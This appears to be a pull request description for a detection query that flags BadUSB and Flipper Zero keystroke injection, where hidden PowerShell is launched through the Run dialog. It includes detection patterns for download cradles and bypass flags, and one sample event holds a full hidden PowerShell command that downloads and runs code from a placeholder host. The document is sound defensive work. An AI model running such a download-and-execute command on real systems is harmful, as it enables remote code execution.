What Changed

Added a new hunting query to detect BadUSB and hardware HID injection attacks that use the Windows Run dialog (WIN+R) to execute PowerShell with evasion techniques.

Detection Logic

Queries DeviceProcessEvents to identify PowerShell processes with these characteristics:

  • Parent process: explorer.exe (indicates GUI-initiated execution via Run dialog)
  • Child process: powershell.exe or pwsh.exe
  • Required flags: -WindowStyle Hidden (concealment)
  • Evasion indicators: Any of 9 common cradle/bypass techniques including:
    • Remote execution: DownloadString, WebClient, IEX
    • Profile bypass: -NoProfile, -NonInteractive
    • Policy bypass: -ExecutionPolicy Bypass

The combination of hidden execution from explorer.exe parent with evasion flags creates high-confidence detection of automated injection rather than legitimate user activity.
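To make the four-part logic above concrete, here is an added Python re-implementation of it run over constructed sample telemetry; it is not the PR's KQL and not part of the repository. The `ProcessEvent` field names are assumed stand-ins for DeviceProcessEvents columns, and the indicator list covers only the six of the nine evasion patterns that this description names.

```python
import re
from dataclasses import dataclass

# The six evasion indicators the PR names; it says the query checks nine, but
# the other three are not listed on the page, so this example covers these six.
EVASION = re.compile(
    r"DownloadString|WebClient|\bIEX\b|-NoProfile|-NonInteractive|-ExecutionPolicy\s+Bypass",
    re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-WindowStyle\s+Hidden", re.IGNORECASE)
POWERSHELL = {"powershell.exe", "pwsh.exe"}

@dataclass
class ProcessEvent:
    """Constructed stand-in for a DeviceProcessEvents row (field names assumed)."""
    device_name: str
    initiating_process_file_name: str  # parent process
    file_name: str                     # child process
    process_command_line: str

def matches_badusb_run_dialog(ev: ProcessEvent) -> bool:
    """Every condition from the PR must hold: explorer.exe parent, PowerShell
    child, -WindowStyle Hidden, and at least one evasion indicator."""
    if ev.initiating_process_file_name.lower() != "explorer.exe":
        return False
    if ev.file_name.lower() not in POWERSHELL:
        return False
    if not HIDDEN_WINDOW.search(ev.process_command_line):
        return False
    return EVASION.search(ev.process_command_line) is not None

def hunt(events):
    """Return the device names of events that trip the detection."""
    return [ev.device_name for ev in events if matches_badusb_run_dialog(ev)]

# Constructed sample telemetry: one true positive and three near-misses that
# each fail exactly one condition, to show why all of them are required.
SAMPLE_EVENTS = [
    ProcessEvent("ws01", "explorer.exe", "powershell.exe",
                 "powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass "
                 "-Command IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"),
    ProcessEvent("ws02", "explorer.exe", "powershell.exe",   # hidden, but no evasion indicator
                 "powershell -WindowStyle Hidden -File C:\\Scripts\\backup.ps1"),
    ProcessEvent("ws03", "cmd.exe", "pwsh.exe",              # evasive, but not launched via explorer.exe
                 "pwsh -WindowStyle Hidden -NoProfile -Command IEX $x"),
    ProcessEvent("ws04", "explorer.exe", "pwsh.exe",         # evasive, but window not hidden
                 "pwsh -NoProfile -ExecutionPolicy Bypass -Command Get-Date"),
]
```

`hunt(SAMPLE_EVENTS)` returns `['ws01']`; the three near-misses show that dropping any single condition would start flagging ordinary hidden-window shortcuts or launches that did not come through the Run dialog.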

Security Impact

Provides visibility into hardware-based initial access attacks including:

  • Flipper Zero and Rubber Ducky USB keystroke injection
  • BadUSB attacks using WIN+R automation
  • Physical access scenarios with automated payload delivery

The query has been validated against real Flipper Zero payloads and includes companion SIGMA rules for broader SIEM coverage.

MITRE Mapping

  • T1200 (Hardware Additions) - USB HID injection devices
  • T1059.001 (PowerShell) - Script execution post-injection
  • T1564.003 (Hidden Window) - Concealment via WindowStyle parameter

Affected Files

Hunting Queries/DeviceProcess/BadUSBPowerShellRunDialog.yaml